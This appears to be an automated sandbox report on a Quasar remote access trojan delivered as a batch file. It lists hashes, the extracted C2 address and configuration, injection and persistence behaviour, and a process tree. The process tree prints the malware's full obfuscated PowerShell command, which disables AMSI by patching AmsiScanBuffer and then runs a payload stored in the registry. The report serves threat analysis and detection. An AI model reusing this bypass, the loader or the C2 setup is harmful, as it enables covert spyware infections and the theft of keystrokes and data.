quasar | 8711245a4e790f4e757f4657e0edd3ff36cd767293e60b56d8e8501bca9c8a3d

General

Target

Uni.bat
Size

670KB
MD5

6a80458e28d1386f08bbd333e223ec19
SHA1

77ab8b6fa59cc618bf4a5e7f52ffcd8f5c9656a8
SHA256

8711245a4e790f4e757f4657e0edd3ff36cd767293e60b56d8e8501bca9c8a3d
SHA512

e6db2882538d6b563aaeb8df1831ea8c90dd37242fe686e9ab0b80f9c397bdfdf3596b28b036ac9308c456257e7a3cc607657c4e98853647e85d23f8b1588d81
SSDEEP

12288:3X+4dH3qy2pEKjy2YkbOtscQeH8XDYTDL832UtYnUg3:H+4dH3enjy2ZbOzTceUq

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes

encryption_key
UBXs44u6E81wxBGZxQHk
install_name
$sxr-powershell.exe
log_directory
$SXR-KEYLOGS
reconnect_delay
3000
startup_key
$sxr-powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\x.exe	family_quasar
behavioral1/memory/4824-7986-0x00000000000D0000-0x000000000013C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 3592 created 640 3592 powershell.EXE winlogon.exe
PID 2300 created 640 2300 powershell.EXE winlogon.exe
Executes dropped EXE 4 IoCs

Processes:

x.exe$sxr-powershell.exeinstall.exeinstall.exe

pid process

4824 x.exe
1700 $sxr-powershell.exe
708 install.exe
5024 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
4 raw.githubusercontent.com
8 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 3592 created 640	3592	powershell.EXE	winlogon.exe
PID 2300 created 640	2300	powershell.EXE	winlogon.exe

pid	process
4824	x.exe
1700	$sxr-powershell.exe
708	install.exe
5024	install.exe

flow	ioc
1	raw.githubusercontent.com
4	raw.githubusercontent.com
8	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 3592 set thread context of 2208	3592	powershell.EXE	dllhost.exe
PID 2300 set thread context of 4084	2300	powershell.EXE	dllhost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exe

pid process

5100 schtasks.exe
1292 SCHTASKS.exe
4828 schtasks.exe

pid	process
5100	schtasks.exe
1292	SCHTASKS.exe
4828	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.EXEpowershell.EXEdllhost.exe$sxr-powershell.exedllhost.exe

pid	process
3592	powershell.EXE
3592	powershell.EXE
2300	powershell.EXE
2300	powershell.EXE
3592	powershell.EXE
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
1700	$sxr-powershell.exe
2208	dllhost.exe
2208	dllhost.exe
2300	powershell.EXE
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
2208	dllhost.exe
1700	$sxr-powershell.exe
2300	powershell.EXE
4084	dllhost.exe
4084	dllhost.exe
4084	dllhost.exe
4084	dllhost.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

x.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	4824	x.exe
Token: SeDebugPrivilege	1700	$sxr-powershell.exe
Token: SeDebugPrivilege	3592	powershell.EXE
Token: SeDebugPrivilege	2300	powershell.EXE
Token: SeDebugPrivilege	3592	powershell.EXE
Token: SeDebugPrivilege	2208	dllhost.exe
Token: SeDebugPrivilege	2300	powershell.EXE
Token: SeDebugPrivilege	4084	dllhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-powershell.exe

pid process

1700 $sxr-powershell.exe

pid	process
1700	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exex.exe$sxr-powershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4876 wrote to memory of 2384	4876	cmd.exe	findstr.exe
PID 4876 wrote to memory of 2384	4876	cmd.exe	findstr.exe
PID 4876 wrote to memory of 1748	4876	cmd.exe	cscript.exe
PID 4876 wrote to memory of 1748	4876	cmd.exe	cscript.exe
PID 4876 wrote to memory of 4824	4876	cmd.exe	x.exe
PID 4876 wrote to memory of 4824	4876	cmd.exe	x.exe
PID 4876 wrote to memory of 4824	4876	cmd.exe	x.exe
PID 4824 wrote to memory of 5100	4824	x.exe	schtasks.exe
PID 4824 wrote to memory of 5100	4824	x.exe	schtasks.exe
PID 4824 wrote to memory of 5100	4824	x.exe	schtasks.exe
PID 4824 wrote to memory of 1700	4824	x.exe	$sxr-powershell.exe
PID 4824 wrote to memory of 1700	4824	x.exe	$sxr-powershell.exe
PID 4824 wrote to memory of 1700	4824	x.exe	$sxr-powershell.exe
PID 4824 wrote to memory of 708	4824	x.exe	install.exe
PID 4824 wrote to memory of 708	4824	x.exe	install.exe
PID 4824 wrote to memory of 708	4824	x.exe	install.exe
PID 4824 wrote to memory of 1292	4824	x.exe	SCHTASKS.exe
PID 4824 wrote to memory of 1292	4824	x.exe	SCHTASKS.exe
PID 4824 wrote to memory of 1292	4824	x.exe	SCHTASKS.exe
PID 1700 wrote to memory of 4828	1700	$sxr-powershell.exe	schtasks.exe
PID 1700 wrote to memory of 4828	1700	$sxr-powershell.exe	schtasks.exe
PID 1700 wrote to memory of 4828	1700	$sxr-powershell.exe	schtasks.exe
PID 1700 wrote to memory of 5024	1700	$sxr-powershell.exe	install.exe
PID 1700 wrote to memory of 5024	1700	$sxr-powershell.exe	install.exe
PID 1700 wrote to memory of 5024	1700	$sxr-powershell.exe	install.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 3592 wrote to memory of 2208	3592	powershell.EXE	dllhost.exe
PID 2208 wrote to memory of 640	2208	dllhost.exe	winlogon.exe
PID 2208 wrote to memory of 696	2208	dllhost.exe	lsass.exe
PID 2208 wrote to memory of 988	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 436	2208	dllhost.exe	dwm.exe
PID 2208 wrote to memory of 748	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 444	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1100	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1108	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1188	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1220	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1268	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1304	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1364	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1436	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1536	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1624	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1636	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1688	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1736	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1768	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1840	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1928	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1980	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1988	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 1448	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 2064	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 2172	2208	dllhost.exe	spoolsv.exe
PID 2208 wrote to memory of 2280	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 2364	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 2460	2208	dllhost.exe	svchost.exe
PID 2208 wrote to memory of 2468	2208	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:436

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e51d8a0b-0191-4996-b00e-710d5ee9cb42}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3c6b0225-e10e-4150-bedf-f4de8c3ab51c}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JRYpftEhgbOI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WeWZqcFlElZiQa,[Parameter(Position=1)][Type]$yfsEIKzzxo)$UHeubxFrXnt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+'e'+'l'+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'m'+'o'+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+'e'+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+'ut'+'o'+'C'+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$UHeubxFrXnt.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$WeWZqcFlElZiQa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$UHeubxFrXnt.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+'u'+'bl'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+','+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+'Vir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$yfsEIKzzxo,$WeWZqcFlElZiQa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $UHeubxFrXnt.CreateType();}$FJUpAUHWGostJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+'NativeM'+[Char](101)+'t'+[Char](104)+'o'+[Char](100)+''+'s'+'');$FEbJGdahghMgnu=$FJUpAUHWGostJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+'c'+[Char](65)+'d'+'d'+'ress',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HuSfXmxWIeKOqzEXezj=JRYpftEhgbOI @([String])([IntPtr]);$doVFJlqcLAFMnmicbCGyYi=JRYpftEhgbOI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PBKYLZcuPQD=$FJUpAUHWGostJ.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+''+'2'+''+'.'+''+'d'+'l'+[Char](108)+'')));$ZBBAGHVbGyBqqa=$FEbJGdahghMgnu.Invoke($Null,@([Object]$PBKYLZcuPQD,[Object](''+[Char](76)+'oad'+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$SrACrGkJrcGiVprKl=$FEbJGdahghMgnu.Invoke($Null,@([Object]$PBKYLZcuPQD,[Object](''+'V'+''+'i'+''+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TvPTAFX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZBBAGHVbGyBqqa,$HuSfXmxWIeKOqzEXezj).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$tfxyezlZgiApThuyv=$FEbJGdahghMgnu.Invoke($Null,@([Object]$TvPTAFX,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$AhPrTJpCDw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SrACrGkJrcGiVprKl,$doVFJlqcLAFMnmicbCGyYi).Invoke($tfxyezlZgiApThuyv,[uint32]8,4,[ref]$AhPrTJpCDw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tfxyezlZgiApThuyv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SrACrGkJrcGiVprKl,$doVFJlqcLAFMnmicbCGyYi).Invoke($tfxyezlZgiApThuyv,[uint32]8,0x20,[ref]$AhPrTJpCDw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+'t'+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JkArrNdATHnm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZpWDyVCibucvOV,[Parameter(Position=1)][Type]$bOcJIWXQEG)$aZdvvLpqsTA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'ct'+[Char](101)+''+[Char](100)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'mor'+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'l'+'a'+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$aZdvvLpqsTA.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZpWDyVCibucvOV).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+'M'+'a'+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$aZdvvLpqsTA.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$bOcJIWXQEG,$ZpWDyVCibucvOV).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[C